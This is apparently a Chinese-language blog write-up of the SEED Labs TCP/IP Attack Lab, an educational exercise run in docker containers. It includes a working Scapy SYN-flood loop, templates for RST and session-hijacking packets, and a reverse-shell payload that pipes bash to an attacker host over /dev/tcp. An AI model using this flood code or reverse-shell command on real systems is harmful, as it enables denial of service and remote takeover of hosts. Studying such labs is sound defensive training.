SEED Labs – TCP/IP Attack Lab

最新推荐文章于 2024-01-14 11:18:41 发布
最新推荐文章于 2024-01-14 11:18:41 发布
阅读量807 收藏 17
点赞数
分类专栏: 信息安全 文章标签: tcp/ip docker linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48650774/article/details/128246713
版权

目录

Container Setup and Commands

Download the Labsetup.zip file to your VM from the lab’s website, unzip it, enter the Labsetup folder.

$ docker-compose build  # Build the container image
$ docker-compose up     # Start the container
$ docker-compose down   # Shut down the container

// Aliases for the Compose commands above
$ dcbuild
$ dcup
$ dcdown
# Alias for: docker-compose build
# Alias for: docker-compose up
# Alias for: docker-compose down

$ dockps        // Alias for: docker ps --format "{{.ID}}  {{.Names}}"
$ docksh <id>   // Alias for: docker exec -it <id> /bin/bash

$ dockps
b1004832e275  hostA-10.9.0.5
0af4ea7a3e2e  hostB-10.9.0.6
9652715c8e0a  hostC-10.9.0.7

// The following example shows how to get a shell inside hostC
$ docksh 96
root@9652715c8e0a:/#

Task 1: SYN Flooding Attack

TCP SYN Flood攻击就是一种Dos攻击方式,利用的是在短时间内与Server建立多个TCP的半连接(未发送ACK数据包),因此Server在没有防御措施的情况下都会接收并建立连接等待ACK数据包。
在这里插入图片描述
抵御该模式的方式就是TCP cookies,在完成三次握手之前不会为任何一个连接分配资源。

(1)查看泛洪攻击前被攻击主机上的TCP链接的状态;
在这里插入图片描述

(2)关闭SYN Cookie,发起SYN泛洪攻击;

$ sysctl -a | grep syncookies     #Display the SYN cookie flag)
$ sysctl -w net.ipv4.tcp_syncookies=0 #turn off SYN cookie)
$ sysctl -w net.ipv4.tcp_syncookies=1 #turn on  SYN cookie)

from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
from random import getrandbits
ip  = IP(dst="*.*.*.*")
tcp = TCP(dport=**, flags=’S’)
pkt = ip/tcp
while True:
pkt[IP].src    = str(IPv4Address(getrandbits(32)))  # source iP
pkt[TCP].sport = getrandbits(16)     # source port
pkt[TCP].seq   = getrandbits(32)     # sequence number
send(pkt, verbose = 0)

在这里插入图片描述

(3)向受害机发起telnet连接,查看出现的情况;
在这里插入图片描述

(4)查看泛洪攻击后被攻击主机上的TCP链接的状态;
在这里插入图片描述(5)在观察机上用Wireshark查看攻击机和受害机之间通信的数据包的情况;
在这里插入图片描述

(6)启动SYN Cookie后,再次发起泛洪攻击;
在这里插入图片描述

(7)再次向受害机发起telnet连接,查看出现的情况。
在这里插入图片描述

Task 2: TCP RST Attacks on telnet Connections

TCP的reset以及会话劫持攻击都是在已经建立的连接的基础上,通过嗅探到seq以及ack序列号以及相关信息从而伪造数据包,破坏连接。

(1)把第一个步骤的3个虚拟机分别作为客户机、服务器和攻击机;
在这里插入图片描述

(2)客户机用Telnet连接服务器;
在这里插入图片描述

(3)在攻击机上用Python代码分别发起对服务器复位攻击,并查看客户机上的telnet的连接情况。

由于docker中没有vim,可以在主机的volumes文件中创建编写python文件;或者在docker中安装vim

#安装vim
Apt-get update
Apt-get install vim

#!/usr/bin/env python3
from scapy.all import *
ip  = IP(src="@@@@", dst="@@@@")
tcp = TCP(sport=54256, dport=23, flags="R", seq=@@@@, ack=@@@@)
pkt = ip/tcp
ls(pkt)
send(pkt,verbose=0)

flags字段:
F : FIN - 结束; 结束会话
S : SYN - 同步; 表示开始会话请求
R : RST - 复位;中断一个连接
P : PUSH - 推送; 数据包立即发送
A : ACK - 应答
在这里插入图片描述

Task 3: TCP Session Hijacking

在这里插入图片描述

(1)把第一个步骤的3个虚拟机分别作为客户机、服务器和攻击机;
服务器:user1
在这里插入图片描述

(2)在服务器上创建一个文件“new.txt”,这个文件将会在后续的会话劫持攻击中被删除;
在这里插入图片描述

(3)在客户机上telnet服务器,查看刚才创建的文件“new.txt”;
客户机:user2
在这里插入图片描述

(4)在攻击机上用Python代码发起会话劫持攻击,删除服务器上的“new.txt”;

#!/usr/bin/env python3
from scapy.all import *
ip  = IP(src="@@@@", dst="@@@@")
tcp = TCP(sport=@@@@, dport=@@@@, flags="@@@@", seq=@@@@, ack=@@@@)
data = "@@@@"
pkt = ip/tcp/data
ls(pkt)
send(pkt,verbose=0)

在这里插入图片描述

new.txt文件已经被删除:
在这里插入图片描述

(5)在客户机上使用刚才连接的telnet,看看有什么情况,并请说明原因。
在这里插入图片描述

会话被劫持后,原来的用户无法继续操作,无法发出或者接受信息,也无法退出。因为终端失去了正确的ack与seq。

Task 4: Creating Reverse Shell using TCP Session Hijacking

反向shell,即是攻击者通过nc建立一个tcp server,然后在会话劫持的基础上,可以让受害者执行命令把shell通过nc的端口反弹回攻击者的主机中,从而拿到了受害者机器的执行权限。

首先在Attacker中开启监听9090端口,从Server中反射回的shell会通过9090端口返回回来。

此处nc命令的使用是表示在Attacker中开启的是9090端口,也就是相当于启动了一个tcp服务,此服务监听了从9090端口输入进来的内容。

(1)把第一个步骤的3个虚拟机分别作为客户机、服务器和攻击机;
在这里插入图片描述

(2)在客户机上telent服务器;
在这里插入图片描述

(3)在攻击机上使用Python代码对服务器发起TCP的会话劫持攻击来创建“Reverse Shell”;

#!/usr/bin/env python3
from scapy.all import *
ip  = IP(src="@@@@", dst="@@@@")
tcp = TCP(sport=@@@@, dport=@@@@, flags="@@@@", seq=@@@@, ack=@@@@)
data = "@@@@"
pkt = ip/tcp/data
ls(pkt)
send(pkt,verbose=0)

#data
#创建反向shell
\r/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1\n\x00

在这里插入图片描述

(4)在攻击机上通过ifconfig命令查看是否成功创建“Reverse Shell”;
在这里插入图片描述

在这里插入图片描述

MintCarrie
关注
  • 0
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SEED LABTCP/IP Attack Lab
qq_43599063的博客
07-18 2795
原因这就是SYNcookie机制的作用它在接收到客户端的SYN包时,不立刻为连接分配资源,而是根据SYN包计算一个cookie值作为SYNACK包的初始序列号。此处nc命令的使用是表示在Attacker中开启的是9090端口,也就是相当于启动了一个tcp服务,此服务监听了从9090端口输入进来的内容。这一机制保证了在遭受SYN洪泛攻击时,受害者主机的半开连接队列的资源不会被耗尽,从而能接受观察者主机的正常连接。在Client中由于会话被劫持,已经不能再输入其他的命令了。发现已经无法在其中键入命令。...
【信息安全】seed-labs实验-TCP/IP Attack Lab
可乐大牛的博客
12-10 3402
文件删除成功,并且客户端的光标被锁死,无法输入命令(这个是因为客户端的终端失去了正确的ack与seq,既无法发出信息,也无法接收信息,甚至无法退出。在wireshark上可以找到最新的报文信息,最新的是客户端发给服务器的,那我们模拟客户端再发一条,只需要改变序列号就好了。在wireshark上可以找到最新的报文信息,最新的是客户端发给服务器的,那我们模拟客户端再发一条,只需要改变序列号就好了。攻击脚本:py文件(攻击速度慢,因为是虚拟机,半连接会自动重置,要是攻击的速度赶不上重置的速度就实验失败了)
SEED-Lab) TCP/IP Attack Lab
lunan的博客
02-17 6610
SEED-Lab) TCP/IP Attack Lab 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录(SEED-Lab) TCP/IP Attack Lab一、实验目标二、实验原理三、实验过程3.1 Task 1: SYN Flooding Attack3.2 Task 2: TCP RST Attacks on telnet and ssh Connections3.2.2 SSH connection3.3 Task 3: TCP RST Attacks
docker安装sh
I'm Zz.
02-19 735
docker安装sh
SeedLab——Cross-Site Scripting (XSS) Attack Lab
Aft3rGl0w的博客
01-14 1034
CSP通过指定允许加载和执行的内容源和资源,限制了浏览器中可以执行的代码。JavaScript可以操作cookie,因此当一个页面存在xss漏洞时,攻击者嵌入的恶意代码就能够完成截获所有访问该页面的cookie,然后将cookie发送给攻击者的服务器的行为,这样攻击者就能使用cookie冒充这些用户的身份了。cookie是存储在客户端的一些键值数据,它用于跟踪和存储有关用户状态、会话和身份验证,因此cookie是浏览器客户端的十分敏感的数据,如果cookie被泄露,就会造成敏感信息的泄露、用户身份的冒用。
SEED Labs 2.0】TCP Attacks Lab
Chenyang的博客
08-29 9161
本文为 SEED Labs 2.0 - TCP Attacks Lab 的实验记录。本实验需要分清到底劫持的哪个报文,剩下的工作就很简单了。
微型嵌入式TCP/IP协议栈开发
01-28
嵌入式设备网络化开发具有广阔的应用前景, 是网络化发展的一个重要方向,而具有TCP/IP...通过在Silicon Labs公司的C8051F340微控制器和CP2200以太网卡的平台上构建Web服务器进行测试,证明嵌入式TCP/IP协议栈运行良好。
seedlabs:SEED 实验室的动手实验脚本
06-10
种子实验室 动手实验脚本。 实验室设置
复旦大学_软件安全_SEED labs_9-Meltdown.zip
06-28
复旦大学_软件安全_SEED labs_9-Meltdown实验 是从雪城大学SEED labs上找的实验 资源包括: 攻击修改代码、实验报告详细版、实验指导书、参考链接
网络攻防课程seed-labs实验-Spectre_Attack.zip
最新发布
06-01
网络攻防课程seed-labs实验-Spectre_Attack.zip
tcpip实验指导书
05-26
这是一份TCPIP的实验指导书
Session Hijacking
05-08
this document is about the PHP Session security, for my didn't install any Chinese input yet, So I have to make this description in English. Hope you enjoy this document, though I don't the content also.
复旦大学_软件安全_SEED labs_5-Dirty_Cow.zip
06-27
复旦大学_软件安全_SEED labs_5-Dirty_Cow实验 是从雪城大学SEED labs上找的实验 资源包括: 攻击修改代码、实验报告详细版、实验指导书、参考链接
使用VirtualBox安装Seed 虚拟机踩坑记录
雨渊的博客
10-22 1221
一、 关于下载seed镜像 官方下载地址 浙大源的镜像我这边下到的都是损坏的,可能是校外访问的原因。 后来终于下下来了,还挺不好下的,有需要的可以来这里取 二、关于安装seed虚拟机镜像 想要安装对应的镜像,首先需要下载VirtualBox, 这里注意按照Seed的要求选择版本。 在安装过程中,在Seed的官网提供了安装的文档在这里~,如果没有下到可以下这个(是一样的,不过还是推荐官网下载,这个文件很小,而且官网嘛,放心一些) (以下默认你已经按照文档上说的做了哦) 问题1. 安装好后无法启动
SEED Labs 2.0】V*N Tunneling Lab
Chenyang的博客
08-27 4147
本文为 SEED Labs 2.0 - V*N Tunneling Lab 的实验记录。本实验工作量较大,但难度不大,重点在于搞清是谁发给谁,走的什么路径。另外,本次实验由于网络中的设备较多,修改了环境变量方便分清哪个窗口是哪个设备。这样操作起来就方便多了。...
[SEEDLabs]buffer overflow
痛苦实验记录
03-10 7138
纠结又纠结的实验,希望下次老师能讲清楚每个实验的要求……解决好前面的问题之后,后面几个上手就没有那么困难了。我果然还是学的太不扎实了,也缺少相关经验,磨蹭了好久才弄出来,羞愧。 1.环境配置 首先是配置虚拟机,在官网可以下载vitual box可用的镜像,然后自己安装一下。提前配置好的虚拟机自己不用调节很多。 然后讲一讲这个实验。我们做的版本是Buffer Overflow Attack Lab (Server Version),在Ubuntu2...
SeedLab6: TCP/IP Attack Lab
Rachel_IS的博客
01-19 3399
针对TCP协议的攻击实验~ 四类攻击: SYN 洪泛攻击 TCP RST攻击 TCP会话劫持 反弹shell 工具:netwox/scapy,实测netwox即可完成 SYN 洪泛攻击 先康康受害者主机半开连接的等待队列有多大: 先关掉SYN cookie机制进行攻击: 指定IP,netwox进行攻击: 能看到受害者主机有大量23号端口的半开连接: 此时如果从观察者主机telnet受害者主机,没有响应直到超时: 再打开SYN cookie进行攻击: 依然有很多很多半开连接: 但这时候从观察者
TCP/IP Attack Lab
(∪.∪ )...zzz的博客
11-10 3913
目录启动环境Task 1.1: Launching the Attack Using PythonTask 1.2: Launch the Attack Using CTask 2: TCP RST Attacks on telnet ConnectionsTask 3: TCP Session HijackingTask 4: Creating Reverse Shell using TCP Session Hijacking 启动环境 Task 1.1: Launching the Attack Us
漏洞分析TCP/IP Attack Lab(自用,记录)
weixin_48392428的博客
07-06 2956
TCP/IP Attack Lab1 Lab Overview2 Lab Environment2.1 Environment Setup2.2 Note for Instructors(就是一些介绍,可以忽略)3 Lab Tasks3.1 Task 1 : SYN Flooding Attack3.2 Task 2 : TCP RST Attacks on telnet and ssh Connections3.3 Task 3 : TCP RST Attacks on Video Streaming A
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入恶意的 SQL 代码来执行未经授权的操作。通过利用这个漏洞,攻击者可以绕过应用程序的认证机制、获取敏感数据或者修改数据库中的内容。 在 Less-17 中,你将面对一个存在 SQL 注入漏洞的应用程序。你需要通过注入恶意的 SQL 代码来绕过应用程序的认证机制,以获取管理员权限。 注意:SQL 注入是一种非法行为,只能在合法的环境下进行学习和实验。在现实世界中,从事任何形式的黑客攻击都是违法行为,请始终遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值